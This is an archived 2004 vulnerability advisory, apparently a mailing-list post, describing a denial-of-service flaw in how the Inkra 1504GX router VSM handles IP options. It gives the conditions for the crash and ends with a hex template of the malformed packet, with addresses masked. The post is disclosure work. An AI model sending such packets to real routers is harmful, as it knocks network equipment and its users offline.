The Inkra 1504GX router suffers from a denial of service vulnerability.
7d88b0aa59b5c2c116b89d4bd94a13fda2109b7744bf6cfd8791bbd00030e7ce
Date: 14 Sep 2004 03:11:38 -0000
From: felix zhou <felix__zhou@hotmail.com>
Subject: Inkra 1504GX DoS vulnerability in conducting IP protocol
Inkra 1504GX DoS vulnerability in conducting IP protocol
Author: Felix Zhou(felix__zhou@hotmail.com)
Song Liu (songsong@shaw.ca)
Release date: 2004-08-25
Affected system:
Inkra 1504GX with router VSM release 2.1.4.b003 (didn't test other products o
f Inkra).
Detail:
Inkra 1504GX's router VSM(release 2.1.4.b003) does not conduct IP
options properly. And Hackers can construct some kind of packet to
make it crash down.
Fortunately, such situation happens only in the following prerequisites:
1. Router VSM is selected in actived VR.
2. Between Router VSM and the VP, no other VSMs exist.
3. The VP is connected to the IO slot directly.
To make the SPM crash down, you have to send the malformed packet at least 3 times, which is uncertai
n for you to perform.
Several seconds interval is necessary between the attacks.
--------------- a packet example ---------------------------
xx xx xx xx xx xx (DMAC)
xx xx xx xx xx xx (SMAC)
08 00
4e cc 00 58 15 24 00 00 56 01 xx xx (ip-csum)
xx xx xx xx (SIP)
xx xx xx xx (DIP)
eb 21 ad a6 eb e1 35 9b ce dd
a7 11 ea 5d c5 96 af 47 c1 50
f1 d1 5c 4b 18 9a c1 8a 13 6b
48 5e 74 83 c6 06
aa 9a 5e c2 a6 75 38 44 f8 43
d7 3f ae a1 e0 c6 e3 7c 4b 59
7a 95 1e 70 cc 04 1b 2a d1 6e
38 83
-----------------------------------------------------------------